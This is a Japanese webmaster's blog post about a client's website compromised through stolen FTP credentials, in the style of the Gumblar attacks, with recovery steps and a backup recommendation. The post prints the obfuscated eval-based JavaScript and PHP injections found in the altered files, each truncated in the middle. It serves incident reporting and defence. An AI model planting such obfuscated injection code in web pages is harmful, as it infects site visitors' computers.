WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

伊藤塾 html ブラウザ アレックス式ネオせどりスクール RSS Includes Pages postpost Favicon ECサイト 登録禁止 ライブチャット タスクバー High Concept Marketing office RSS 短縮URL インターネット CS5 Cash on Wordpress ツイッター アフィ匠 切り抜き マルウエア 改ざん ウイルス Youtube 上位表示 パズル ブロック アドセンス 自動 Adobe クリックランキング 関根義光 IP XHTML マイクロソフト ハート 権利収入 村上省吾 久積篤史 バイマ force puzzle アンダーグラウンドメソッド モザイク 池田純矢 詐欺組織 ビジネス 蝶乃舞 Thunderbird Line ネットショップ バナー エクスチェンジ YouTube Maniax 2017 短縮URLツール functions.php .htaccess 転売大園塾 メモ レタープレス Wordpress Content Slide Google Maps 与沢翼 JavaScript エディタ アフィリエイト ネットゲーム 伊藤 虎太郎 球体 自己アフィリエイト moza 申請金ビジネス デスクトップ Login LockDown ロリポップ 自動化 大園麗花 タイガーウイング 改竄 KMSpico 出店料 石井匠 百度 DTD 日本語入力変換ソフト 表示 Agency Business css 無断送信 アイコン やしろひろたみ MasterCollection getElementById シャンプー Windows HTML4.0 宮田麗花 フォローマティック プロモーション スカイプ ムーバブルタイプ system 切抜き もざ 定型文 新井浩 リンクシェイカー インフォトップ ソース ざくざく君 小笠原健一 CGI 加工 followmatic ネットガレージ getElementByTagName Chrome ランキング サイト改ざん KMS認証 document.all Baidu 管理画面 詐欺 google 滑らか ソースコード がら空きビジネス 高額塾 株式会社SRシステム 放射線 特権ビジネス 山下 背景 トレンドキーワード RMT 掲示板 ブラクラ FTP 情報商材 感染 伊藤虎太郎 ネオヒルズアカデミー Internet Explorer トラフィック 北川 雅嗣 原田真 Ban Hammer スタイルシート 無料 ヤフーショッピング トレンドアフィリエイト 不労所得の神 株式会社バンザイ メルマガ配信システム SKナレッジ 配布 レイアウト 中山秀人 スムーズ 画像 脆弱性 LinkShaker ぼかし エクスプローラー 自己アフィリ WEB アンダーグラウンドアフィリエイトクラブ Yahoo ツール 株式会社ニュース BBIZ 株式会社WINGOOD レンタルサーバー クラウド変換 SyntaxHighlighter PHP 土屋ひろし クロスアフィリエイト wordpress 特定のメールアドレス インペリアルゴールド ボタン Diamond Affiliate Masters Program 量産 BUYMA コピーボタン 株式会社SRシステム FireWorks プロファイル MovableTYpe 大園転売塾 セキュリティ 81a338 ユーチューブマニアクス2017 賢威 カスタマイズ 三橋美仁 iphone CS6 アクセス制限 wpXサーバー 立体 ライオンアフィリエイト tool 加藤 秀吉 サンタ DOCTYPE 個人情報流出 ネットビジネス最後の楽園 到達率 Tiger-Wing フレンドシップメール ブロックポリシー マニュアル バイドゥー SEO ブルートフォースアタック レビュー ソフト IE 不正送信 ワードプレス クラック ドメイン 副業術 復元 不正アクセス プラグイン 秒速で1億円稼ぐ男 高速ゲーム Google Maps API 大園式転売塾 ヤフー Firefox PPC Windows 7 インターネットエクスプローラー 管理ツール 株式会社Free Agent Style エキスパートメール WP @PAGES せどり クラウド入力機能 twitter 大西良幸 グラデーション ファビコン Newpost Catch Extension Manager 株式会社A-ブログレス スクロール ネットビジネス大全集 ライン スマホ 比較 MT 固定ページ ネットビジネス 無料オファー 人物 伊藤 歩 秀吉塾天下統一 バックアップ 与沢翼×蝶乃舞 インターネットビジネススクール 関根塾 ping アレックス SmoothScroll.js ping送信 ヤフオク テンプレート 個人情報 音量アイコン ブラシ wp-login.php explorer 既得権益 android アクセスアップ 優先順位 流出 EC ウインドウ レイアウト崩れ IBS やしろ塾 テーマ

アーカイブ

エステトラブル

このページの先頭へ